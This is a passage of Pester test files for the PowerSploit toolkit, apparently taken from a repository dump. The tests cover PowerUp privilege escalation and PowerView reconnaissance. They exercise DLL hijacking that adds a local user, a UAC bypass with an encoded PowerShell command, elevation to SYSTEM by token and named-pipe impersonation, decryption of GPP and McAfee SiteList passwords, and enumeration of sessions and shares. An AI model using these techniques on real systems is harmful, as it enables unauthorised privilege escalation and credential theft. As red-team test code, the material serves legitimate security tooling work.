-Seconds 3\n            if ( -not ($(net user) -match \"testing\")) {\n                Throw \"Custom command failed.\"\n            }\n        \n            $Output = Restore-ServiceBinary -ServiceName PowerUpService\n            \"$(Get-Location)\\powerup.exe.bak\" | Should Not Exist\n        }\n        finally {\n            $Null = $(net user testing /delete >$Null 2>&1)\n        }\n    }\n}\n\n# TODO: Describe 'Restore-ServiceBinary' {}\n\n########################################################\n#\n# PowerUp .dll hijacking functions.\n#\n########################################################\n\nDescribe 'Find-ProcessDLLHijack' {\n    It 'Should return results.' {\n        $Output = Find-ProcessDLLHijack\n        $Output | Should Not BeNullOrEmpty\n    }\n\n    It 'Should accept a Process name on the pipeline.' {\n        {'powershell' | Find-ProcessDLLHijack} | Should Not Throw\n    }\n\n    It 'Should accept a service object on the pipeline.' {\n        {Get-Process powershell | Find-ProcessDLLHijack} | Should Not Throw\n    }\n}\n\n\nDescribe 'Find-PathDLLHijack' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Find-PathDLLHijack' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should find a hijackable %PATH% folder.' {\n\n        New-Item -Path 'C:\\PowerUpTest\\' -ItemType directory -Force\n\n        $OldPath = $Env:PATH\n        $Env:PATH += ';C:\\PowerUpTest\\'\n\n        $Output = Find-PathDLLHijack | Where-Object {$_.ModifiablePath -like \"*PowerUpTest*\"} | Select-Object -First 1\n\n        $Env:PATH = $OldPath\n\n        $Output.ModifiablePath | Should Be 'C:\\PowerUpTest\\'\n\n        if ($Output.PSObject.Properties.Name -notcontains '%PATH%') {\n            Throw \"Find-PathDLLHijack result doesn't contain '%PATH%' field.\"\n        }\n        if ($Output.PSObject.Properties.Name -notcontains 'ModifiablePath') {\n            Throw \"Find-PathDLLHijack result doesn't contain 'ModifiablePath' field.\"\n        }\n        if ($Output.PSObject.Properties.Name -notcontains 'Permissions') {\n            Throw \"Find-PathDLLHijack result doesn't contain 'Permissions' field.\"\n        }\n        if ($Output.PSObject.Properties.Name -notcontains 'IdentityReference') {\n            Throw \"Find-PathDLLHijack result doesn't contain 'IdentityReference' field.\"\n        }\n\n        $Null = Remove-Item -Recurse -Force 'C:\\PowerUpTest\\' -ErrorAction SilentlyContinue\n    }\n\n    It \"Should find a hijackable %PATH% folder that doesn't yet exist.\" {\n\n        $OldPath = $Env:PATH\n        $Env:PATH += ';C:\\PowerUpTest\\'\n\n        $Output = Find-PathDLLHijack | Where-Object {$_.'%PATH%' -eq 'C:\\PowerUpTest\\'} | Select-Object -First 1\n\n        $Env:PATH = $OldPath\n\n        $Output.ModifiablePath | Should Be 'C:\\'\n\n        if ($Output.PSObject.Properties.Name -notcontains '%PATH%') {\n            Throw \"Find-PathDLLHijack result doesn't contain 'ModifiablePath' field.\"\n        }\n        if ($Output.PSObject.Properties.Name -notcontains 'ModifiablePath') {\n            Throw \"Find-PathDLLHijack result doesn't contain 'ModifiablePath' field.\"\n        }\n        if ($Output.PSObject.Properties.Name -notcontains 'Permissions') {\n            Throw \"Find-PathDLLHijack result doesn't contain 'Permissions' field.\"\n        }\n        if ($Output.PSObject.Properties.Name -notcontains 'IdentityReference') {\n            Throw \"Find-PathDLLHijack result doesn't contain 'IdentityReference' field.\"\n        }\n    }\n}\n\n\nDescribe 'Write-HijackDll' {\n    # won't actually execute on Win8+ with the wlbsctrl.dll method\n    # TODO: write tests to properly cover parameter validation\n    It 'Should write a .dll that executes a custom command.' {\n        try {\n            Write-HijackDll -DllPath \"$(Get-Location)\\powerup.dll\" -Command 'net user testing Password123! /add'\n            \n            \"$(Get-Location)\\powerup.dll\" | Should Exist\n            \"$(Get-Location)\\debug.bat\" | Should Exist\n        }\n        finally {\n            $Null = Remove-Item -Path \"$(Get-Location)\\powerup.dll\" -Force -ErrorAction SilentlyContinue\n            $Null = Remove-Item -Path \"$(Get-Location)\\debug.bat\" -Force -ErrorAction SilentlyContinue\n        }\n    }\n}\n\n\n########################################################\n#\n# PowerUp registry checks.\n#\n########################################################\n\nDescribe 'Get-RegistryAlwaysInstallElevated' {\n    # TODO: set registry key, ensure it retrieves\n    It 'Should not throw.' {\n        {Get-RegistryAlwaysInstallElevated} | Should Not Throw\n    }\n}\n\n\nDescribe 'Get-RegistryAutoLogon' {\n    # TODO: set a vulnerable autorun credential, ensure it retrieves\n    It 'Should not throw.' {\n        {Get-RegistryAutoLogon} | Should Not Throw\n    }\n}\n\n\nDescribe 'Get-ModifiableRegistryAutoRun' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-ModifiableRegistryAutoRun' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-ModifiableRegistryAutoRun} | Should Not Throw\n    }\n\n    It 'Should find a vulnerable autorun.' {\n        try {\n            $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n            $Null | Out-File -FilePath $FilePath -Force\n            $Null = Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name PowerUp -Value \"vuln.exe -i '$FilePath'\"\n\n            $Output = Get-ModifiableRegistryAutoRun | Where-Object {$_.ModifiableFile -like \"*$FilePath*\"} | Select-Object -First 1\n\n            $Output.ModifiableFile.ModifiablePath | Should Be $FilePath\n\n            if ($Output.PSObject.Properties.Name -notcontains 'Key') {\n                Throw \"Get-ModifiableRegistryAutoRun result doesn't contain 'Key' field.\"\n            }\n            if ($Output.PSObject.Properties.Name -notcontains 'Path') {\n                Throw \"Get-ModifiableRegistryAutoRun result doesn't contain 'Path' field.\"\n            }\n            if ($Output.PSObject.Properties.Name -notcontains 'ModifiableFile') {\n                Throw \"Get-ModifiableRegistryAutoRun result doesn't contain 'ModifiableFile' field.\"\n            }\n\n            if ($Output.ModifiableFile.PSObject.Properties.Name -notcontains 'ModifiablePath') {\n                Throw \"Get-ModifiableRegistryAutoRun ModifiableFile result doesn't contain 'ModifiablePath' field.\"\n            }\n            if ($Output.ModifiableFile.PSObject.Properties.Name -notcontains 'Permissions') {\n                Throw \"Get-ModifiableRegistryAutoRun ModifiableFile result doesn't contain 'Permissions' field.\"\n            }\n            if ($Output.ModifiableFile.PSObject.Properties.Name -notcontains 'IdentityReference') {\n                Throw \"Get-ModifiableRegistryAutoRun ModifiableFile result doesn't contain 'IdentityReference' field.\"\n            }\n\n            $Null = Remove-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name PowerUp\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n}\n\n\n########################################################\n#\n# PowerUp misc. checks.\n#\n########################################################\n\nDescribe 'Get-ModifiableScheduledTaskFile' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-ModifiableScheduledTaskFile' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-ModifiableScheduledTaskFile} | Should Not Throw\n    }\n\n    It 'Should find a vulnerable config file for a binary specified in a schtask.' {\n        try {\n            $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n            $Null | Out-File -FilePath $FilePath -Force\n\n            $Null = schtasks.exe /create /tn PowerUp /tr \"vuln.exe -i '$FilePath'\" /sc onstart /ru System /f\n\n            $Output = Get-ModifiableScheduledTaskFile | Where-Object {$_.TaskName -eq 'PowerUp'} | Select-Object -First 1\n            $Null = schtasks.exe /delete /tn PowerUp /f\n\n            $Output.TaskFilePath.ModifiablePath | Should Be $FilePath\n\n            if ($Output.PSObject.Properties.Name -notcontains 'TaskName') {\n                Throw \"Get-ModifiableScheduledTaskFile result doesn't contain 'TaskName' field.\"\n            }\n            if ($Output.PSObject.Properties.Name -notcontains 'TaskFilePath') {\n                Throw \"Get-ModifiableScheduledTaskFile result doesn't contain 'TaskFilePath' field.\"\n            }\n            if ($Output.PSObject.Properties.Name -notcontains 'TaskTrigger') {\n                Throw \"Get-ModifiableScheduledTaskFile result doesn't contain 'TaskTrigger' field.\"\n            }\n\n            if ($Output.TaskFilePath.PSObject.Properties.Name -notcontains 'ModifiablePath') {\n                Throw \"Get-ModifiableScheduledTaskFile TaskFilePath result doesn't contain 'ModifiablePath' field.\"\n            }\n            if ($Output.TaskFilePath.PSObject.Properties.Name -notcontains 'Permissions') {\n                Throw \"Get-ModifiableScheduledTaskFile TaskFilePath result doesn't contain 'Permissions' field.\"\n            }\n            if ($Output.TaskFilePath.PSObject.Properties.Name -notcontains 'IdentityReference') {\n                Throw \"Get-ModifiableScheduledTaskFile TaskFilePath result doesn't contain 'IdentityReference' field.\"\n            }\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n}\n\n\nDescribe 'Get-UnattendedInstallFile' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-UnattendedInstallFile' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-UnattendedInstallFile} | Should Not Throw\n    }\n    It 'Should return a leftover autorun' {\n        $FilePath = Join-Path $Env:WinDir \"\\System32\\Sysprep\\unattend.xml\"\n\n        try {\n            $Null | Out-File -FilePath $FilePath -Force\n            $Output = Get-UnattendedInstallFile\n\n            $Output | Should Not BeNullOrEmpty\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n}\n\n\nDescribe 'Get-Webconfig' {\n    It 'Should not throw.' {\n        {Get-Webconfig} | Should Not Throw\n    }\n}\n\n\nDescribe 'Get-ApplicationHost' {\n    It 'Should not throw.' {\n        {Get-ApplicationHost} | Should Not Throw\n    }\n}\n\nDescribe 'Get-SiteListPassword' {\n    BeforeEach {\n        $Xml = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><ns:SiteLists xmlns:ns=\"naSiteList\" Type=\"Client\"><SiteList Default=\"1\" Name=\"SomeGUID\"><HttpSite Type=\"fallback\" Name=\"McAfeeHttp\" Order=\"26\" Enabled=\"1\" Local=\"0\" Server=\"update.nai.com:80\"><RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted=\"1\">jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==</Password></HttpSite><UNCSite Type=\"repository\" Name=\"Paris\" Order=\"13\" Server=\"paris001\" Enabled=\"1\" Local=\"0\"><ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount><DomainName>companydomain</DomainName><UserName>McAfeeService</UserName><Password Encrypted=\"0\">Password123!</Password></UNCSite><UNCSite Type=\"repository\" Name=\"Tokyo\" Order=\"18\" Server=\"tokyo000\" Enabled=\"1\" Local=\"0\"><ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount><DomainName>companydomain</DomainName><UserName>McAfeeService</UserName><Password Encrypted=\"1\">jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==</Password></UNCSite></SiteList></ns:SiteLists>'\n        $Xml | Out-File -FilePath \"${Home}\\SiteList.xml\" -Force\n    }\n    AfterEach {\n        Remove-Item -Force \"${Home}\\SiteList.xml\"\n    }\n\n    It 'Should correctly find and parse a SiteList.xml file.' {\n\n        $Credentials = Get-SiteListPassword\n        \n        $Credentials | Where-Object {$_.Name -eq 'McAfeeHttp'} | ForEach-Object {\n            # HTTP site\n            $_.Enabled | Should Be '1'\n            $_.Server | Should Be 'update.nai.com:80'\n            $_.Path | Should Be 'Products/CommonUpdater'\n            $_.EncPassword | Should Be 'jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=='\n            $_.DecPassword | Should Be 'MyStrongPassword!'\n            $_.UserName | Should BeNullOrEmpty\n            $_.DomainName | Should BeNullOrEmpty            \n        } \n        \n        $Credentials | Where-Object {$_.Name -eq 'Paris'} | ForEach-Object {\n            # UNC site with unencrypted password\n            $_.Enabled | Should Be '1'\n            $_.Server | Should Be 'paris001'\n            $_.Path | Should Be 'Repository$'\n            $_.EncPassword | Should Be 'Password123!'\n            $_.DecPassword | Should Be 'Password123!'\n            $_.UserName | Should Be 'McAfeeService'\n            $_.DomainName | Should Be 'companydomain'\n        }\n\n        $Credentials | Where-Object {$_.Name -eq 'Tokyo'} | ForEach-Object {\n            # UNC site with encrypted password\n            $_.Enabled | Should Be '1'\n            $_.Server | Should Be 'tokyo000'\n            $_.Path | Should Be 'Repository$'\n            $_.EncPassword | Should Be 'jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=='\n            $_.DecPassword | Should Be 'MyStrongPassword!'\n            $_.UserName | Should Be 'McAfeeService'\n            $_.DomainName | Should Be 'companydomain'\n        }\n    }\n\n    It 'Should correctly parse a SiteList.xml on a specified path.' {\n        \n        $Credentials = Get-SiteListPassword -Path \"${Home}\\SiteList.xml\"\n        \n        $Credentials | Where-Object {$_.Name -eq 'McAfeeHttp'} | ForEach-Object {\n            # HTTP site\n            $_.Enabled | Should Be '1'\n            $_.Server | Should Be 'update.nai.com:80'\n            $_.Path | Should Be 'Products/CommonUpdater'\n            $_.EncPassword | Should Be 'jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=='\n            $_.DecPassword | Should Be 'MyStrongPassword!'\n            $_.UserName | Should BeNullOrEmpty\n            $_.DomainName | Should BeNullOrEmpty            \n        } \n\n        $Credentials | Where-Object {$_.Name -eq 'Paris'} | ForEach-Object {\n            # UNC site with unencrypted password\n            $_.Enabled | Should Be '1'\n            $_.Server | Should Be 'paris001'\n            $_.Path | Should Be 'Repository$'\n            $_.EncPassword | Should Be 'Password123!'\n            $_.DecPassword | Should Be 'Password123!'\n            $_.UserName | Should Be 'McAfeeService'\n            $_.DomainName | Should Be 'companydomain'\n        }\n\n        $Credentials | Where-Object {$_.Name -eq 'Tokyo'} | ForEach-Object {\n            # UNC site with encrypted password\n            $_.Enabled | Should Be '1'\n            $_.Server | Should Be 'tokyo000'\n            $_.Path | Should Be 'Repository$'\n            $_.EncPassword | Should Be 'jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=='\n            $_.DecPassword | Should Be 'MyStrongPassword!'\n            $_.UserName | Should Be 'McAfeeService'\n            $_.DomainName | Should Be 'companydomain'\n        }\n    }\n}\n\n\nDescribe 'Get-CachedGPPPassword' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-CachedGPPPassword' Pester test needs local administrator privileges.\"\n    }\n\n    # all referenced GPP .xml sources from https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/rex/parser/group_policy_preferences_spec.rb\n    It 'Should throw if no files are found.' {\n        Get-CachedGPPPassword | Should Throw\n    }\n\n    It 'Should correctly find and parse a cached Groups.xml file.' {\n        $Path = \"${Env:ALLUSERSPROFILE}\\Microsoft\\Group Policy\\History\\{23C4E89F-7D3A-4237-A61D-8EF82B5B9E42}\\Machine\\Preferences\\Groups\\Groups.xml\"\n        $Null = New-Item -ItemType File -Path $Path -Force\n        $GroupsXml = '<?xml version=\"1.0\" encoding=\"utf-8\"?><Groups clsid=\"{3125E937-EB16-4b4c-9934-544FC6D24D26}\"><User clsid=\"{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}\" name=\"SuperSecretBackdoor\" image=\"0\" changed=\"2013-04-25 18:36:07\" uid=\"{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}\"><Properties action=\"C\" fullName=\"\" description=\"\" cpassword=\"VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3\" changeLogon=\"0\" noChange=\"0\" neverExpires=\"1\" acctDisabled=\"0\" userName=\"SuperSecretBackdoor\"/></User></Groups>'\n        $GroupsXml | Out-File -FilePath $Path -Force\n\n        $GPPResult = Get-CachedGPPPassword\n        Remove-Item -Force $Path\n\n        $GPPResult.Passwords[0] | Should be 'Super!!!Password'\n        $GPPResult.UserNames[0] | Should be 'SuperSecretBackdoor'\n    }\n}\n\n# TODO: Describe 'Write-UserAddMSI' {}\n\nDescribe 'Invoke-WScriptUACBypass' {\n    $OSVersion = [Environment]::OSVersion.Version\n    if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) {\n        It 'Should launch an elevated command.' {\n            Invoke-WScriptUACBypass -Command 'powershell -enc JwAxADIAMwAnACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAcwBrAGEAZABqAGYAbgAuAHQAeAB0ACIA'\n            if (-not (Test-Path -Path \"C:\\Windows\\System32\\skadjfn.txt\")) {\n                Throw \"'Invoke-WScriptUACBypass' did not write a privileged file.\"\n            }\n            {Test-Path -Path \"C:\\Windows\\System32\\skadjfn.txt\"} | Should Not Throw\n            Remove-Item -Path \"C:\\Windows\\System32\\skadjfn.txt\" -Force\n        }\n\n        It \"Should accept -WindowStyle 'Visible'\" {\n            Invoke-WScriptUACBypass -Command notepad.exe -WindowStyle 'Visible'\n            $Process = Get-Process 'notepad'\n            $Process | Should Not BeNullOrEmpty\n            $Process | Stop-Process -Force\n        }\n    }\n    else {\n        Write-Warning 'Target machine is not vulnerable to Invoke-WScriptUACBypass.'\n    }\n}\n\nDescribe 'Invoke-PrivescAudit' {\n    It 'Should return results to stdout.' {\n        $Output = Invoke-PrivescAudit\n        $Output | Should Not BeNullOrEmpty\n    }\n    It 'Should produce a HTML report with -HTMLReport.' {\n        $Output = Invoke-PrivescAudit -HTMLReport\n        $Output | Should Not BeNullOrEmpty\n\n        $HtmlReportFile = \"$($Env:ComputerName).$($Env:UserName).html\"\n\n        $HtmlReportFile | Should Exist\n        $Null = Remove-Item -Path $HtmlReportFile -Force -ErrorAction SilentlyContinue\n    }\n}\n\n\nDescribe 'Get-System' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-System' Pester test needs local administrator privileges.\"\n    }\n\n    AfterEach {\n        Get-System -RevToSelf\n    }\n\n    It 'Should not throw with default parameters and should elevate to SYSTEM.' {\n        { Get-System } | Should Not Throw\n        \"$([Environment]::UserName)\" | Should Be 'SYSTEM'\n    }\n\n    It 'Named pipe impersonation should accept an alternate service and pipe name.' {\n        { Get-System -Technique NamedPipe -ServiceName 'testing123' -PipeName 'testpipe' } | Should Not Throw\n        \"$([Environment]::UserName)\" | Should Be 'SYSTEM'\n    }\n\n    It 'Should elevate to SYSTEM using token impersonation.' {\n        { Get-System -Technique Token } | Should Not Throw\n        \"$([Environment]::UserName)\" | Should Be 'SYSTEM'\n    }\n\n    It '-WhoAmI should display the current user.' {\n        { Get-System -Technique Token } | Should Not Throw\n        { Get-System -WhoAmI } | Should Match 'SYSTEM'\n    }\n\n    It 'RevToSelf should revert privileges.' {\n        { Get-System -Technique Token } | Should Not Throw\n        { Get-System -RevToSelf } | Should Not Throw\n        \"$([Environment]::UserName)\" | Should Not Match 'SYSTEM'\n    }\n\n    It 'Token impersonation should throw with incompatible parameters.' {\n        { Get-System -Technique Token -WhoAmI } | Should Throw\n    }\n}\n"
  },
  {
    "path": "Tests/Recon.tests.ps1",
    "content": "\n$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent\n$ModuleRoot = Resolve-Path \"$TestScriptRoot\\..\"\n$ModuleManifest = \"$ModuleRoot\\Recon\\Recon.psd1\"\n\nRemove-Module [R]econ\nImport-Module $ModuleManifest -Force -ErrorAction Stop\n\n# import PowerView.ps1 manually so we expose the helper functions for testing\n$PowerViewFile = \"$ModuleRoot\\Recon\\PowerView.ps1\"\nImport-Module $PowerViewFile -Force -ErrorAction Stop\n\n\n# Get the local IP address for later testing\n$IPregex = \"(?<Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\"\n$LocalIP = (gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -match $IPregex}).ipaddress[0]\n\n\n########################################################\n#\n# PowerView functions.\n#\n########################################################\n\nDescribe 'Export-PowerViewCSV' {\n    It 'Should Not Throw and should produce .csv output.' {\n        {Get-Process | Export-PowerViewCSV -OutFile process_test.csv} | Should Not Throw\n        '.\\process_test.csv' | Should Exist\n        Remove-Item -Force .\\process_test.csv        \n    }\n}\n\nDescribe 'Get-IPAddress' {\n    $IPregex = \"(?<Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\"\n    It 'Should return local IP address' {\n        if( $(Get-IPAddress) -notmatch $IPRegex ) {\n            Throw 'Invalid local IP address returned'\n        }\n    }\n    It 'Should accept -ComputerName argument' {\n        if( $(Get-IPAddress -ComputerName $env:COMPUTERNAME) -notmatch $IPRegex ) {\n            Throw 'Invalid -ComputerName IP address returned'\n        }\n    }\n}\n\nDescribe 'Convert-SidToName' {\n    It 'Should resolve built in SIDs' {\n        Convert-SidToName -SID 'S-1-5-32-545' | Should Be 'BUILTIN\\Users'\n    }\n    It 'Should accept pipeline input' {\n        'S-1-5-32-552' | Convert-SidToName | Should Be 'BUILTIN\\Replicators'\n    }\n    It 'Should return a unresolvable SID' {\n        Convert-SidToName -SID 'S-1-5-32-1337' | Should Be 'S-1-5-32-1337'\n    }\n}\n\n\nDescribe 'Get-Proxy' {\n    It 'Should Not Throw' {\n        {Get-Proxy} | Should Not Throw\n    }\n    It 'Should accept -ComputerName argument' {\n        {Get-Proxy -ComputerName $env:COMPUTERNAME} | Should Not Throw\n    }   \n}\n\n\nDescribe 'Get-PathAcl' {\n    It 'Should Not Throw' {\n        {Get-PathAcl C:\\} | Should Not Throw\n    }\n    It 'Should return correct ACLs' {\n        $Output = Get-PathAcl -Path C:\\Windows | ?{$_.IdentityReference -eq \"Creator Owner\"}\n        if(-not $Output) {\n            Throw \"Output Not returned\"\n        }\n        if($Output.FileSystemRights -ne 'GenericAll') {\n            Throw \"Incorrect FileSystemRights returned\"\n        }\n    }\n}\n\n\nDescribe 'Get-NameField' {\n    It 'Should extract dnshostname field from custom object' {\n        $Object = New-Object -TypeName PSObject -Property @{'dnshostname' = 'testing1'}\n        if ( (Get-NameField -Object $Object) -ne 'testing1') {\n            Throw \"'dnshostname' field Not parsed correctly\"\n        }\n    }\n    It 'Should extract name field from custom object' {\n        $Object = New-Object -TypeName PSObject -Property @{'name' = 'testing2'}\n        if ( (Get-NameField -Object $Object) -ne 'testing2') {\n            Throw \"'name' field Not parsed correctly\"\n        }\n    } \n    It 'Should handle plaintext strings' {\n        if ( (Get-NameField -Object 'testing3') -ne 'testing3') {\n            Throw 'Plaintext string Not parsed correctly'\n        }\n    } \n    It 'Should accept pipeline input' {\n        $Object = New-Object -TypeName PSObject -Property @{'dnshostname' = 'testing4'}\n        if ( ($Object | Get-NameField) -ne 'testing4') {\n            Throw 'Pipeline input Not processed correctly'\n        }\n    }\n}\n\n\nDescribe \"Get-NetLocalGroup\" {\n    It \"Should return results for local machine administrators\" {\n        if ( (Get-NetLocalGroup | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n    It \"Should return results for listing local groups\" {\n        if ( (Get-NetLocalGroup -ListGroups | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n    # TODO: -ComputerList\n    It \"Should accept -GroupName argument\" {\n        {Get-NetLocalGroup -GroupName \"Remote Desktop Users\"} | Should Not Throw\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        if ( (Get-NetLocalGroup -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        if ( (Get-NetLocalGroup -ComputerName $LocalIP | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n    It \"Should accept pipeline input\" {\n        if ( ( \"$env:computername\" | Get-NetLocalGroup | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n}\n\n\nDescribe \"Get-NetShare\" {\n    It \"Should return results for the local host\" {\n        if ( (Get-NetShare | Measure-Object).count -lt 1) {\n            Throw \"Incorrect share results returned\"\n        }\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        if ( (Get-NetShare -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        if ( (Get-NetShare -ComputerName $LocalIP | Measure-Object).count -lt 1) {\n            Throw \"Incorrect share results returned\"\n        }\n    }\n    It \"Should accept pipeline input\" {\n        if ( ( \"$env:computername\" | Get-NetShare | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n}\n\n\nDescribe \"Get-NetLoggedon\" {\n    It \"Should return results for the local host\" {\n        if ( (Get-NetLoggedon | Measure-Object).count -lt 1) {\n            Throw \"Incorrect loggedon results returned\"\n        }\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        if ( (Get-NetLoggedon -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Incorrect loggedon results returned\"\n        }\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        if ( (Get-NetLoggedon -ComputerName $LocalIP | Measure-Object).count -lt 1) {\n            Throw \"Incorrect loggedon results returned\"\n        }        \n    }\n    It \"Should accept pipeline input\" {\n        if ( ( \"$env:computername\" | Get-NetLoggedon | Measure-Object).count -lt 1) {\n            Throw \"Incorrect local administrators returned\"\n        }\n    }\n}\n\n\nDescribe \"Get-NetSession\" {\n    It \"Should return results for the local host\" {\n        if ( (Get-NetSession | Measure-Object).count -lt 1) {\n            Throw \"Incorrect session results returned\"\n        }\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        if ( (Get-NetSession -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Incorrect session results returned\"\n        }\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        if ( (Get-NetSession -ComputerName $LocalIP | Measure-Object).count -lt 1) {\n            Throw \"Incorrect session results returned\"\n        }\n    }\n    It \"Should accept the -UserName argument\" {\n        {Get-NetSession -UserName 'Administrator'} | Should Not Throw\n    }\n    It \"Should accept pipeline input\" {\n        {\"$env:computername\" | Get-NetSession} | Should Not Throw\n    }\n}\n\n\nDescribe \"Get-NetRDPSession\" {\n    It \"Should return results for the local host\" {\n        if ( (Get-NetRDPSession | Measure-Object).count -lt 1) {\n            Throw \"Incorrect session results returned\"\n        }\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        if ( (Get-NetRDPSession -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Incorrect session results returned\"\n        }\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        if ( (Get-NetRDPSession -ComputerName $LocalIP | Measure-Object).count -lt 1) {\n            Throw \"Incorrect session results returned\"\n        }\n    }\n    It \"Should accept pipeline input\" {\n        {\"$env:computername\" | Get-NetRDPSession} | Should Not Throw\n    }\n}\n\n\nDescribe \"Invoke-CheckLocalAdminAccess\" {\n    It \"Should Not Throw for localhost\" {\n        {Invoke-CheckLocalAdminAccess} | Should Not Throw\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        {Invoke-CheckLocalAdminAccess -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        {Invoke-CheckLocalAdminAccess -ComputerName $LocalIP} | Should Not Throw\n    }\n    It \"Should accept pipeline input\" {\n        {\"$env:computername\" | Invoke-CheckLocalAdminAccess} | Should Not Throw\n    }\n}\n\n\nDescribe \"Get-LastLoggedOn\" {\n    It \"Should return results for the local host\" {\n        if ( (Get-LastLoggedOn | Measure-Object).count -lt 1) {\n            Throw \"Incorrect loggedon results returned\"\n        }\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        if ( (Get-LastLoggedOn -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Incorrect loggedon results returned\"\n        }\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        if ( (Get-LastLoggedOn -ComputerName $LocalIP | Measure-Object).count -lt 1) {\n            Throw \"Incorrect loggedon results returned\"\n        }\n    }\n    It \"Should accept pipeline input\" {\n        {\"$env:computername\" | Get-LastLoggedOn} | Should Not Throw\n    }\n}\n\n\nDescribe \"Get-CachedRDPConnection\" {\n    It \"Should Not Throw\" {\n        {Get-CachedRDPConnection} | Should Not Throw\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        {Get-CachedRDPConnection -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        {Get-CachedRDPConnection -ComputerName $LocalIP} | Should Not Throw\n    }\n    It \"Should accept pipeline input\" {\n        {\"$env:computername\" | Get-CachedRDPConnection} | Should Not Throw\n    }\n}\n\n\nDescribe \"Get-NetProcess\" {\n    It \"Should return results for the local host\" {\n        if ( (Get-NetProcess | Measure-Object).count -lt 1) {\n            Throw \"Incorrect process results returned\"\n        }\n    }\n    It \"Should accept NETBIOS -ComputerName argument\" {\n        if ( (Get-NetProcess -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Incorrect process results returned\"\n    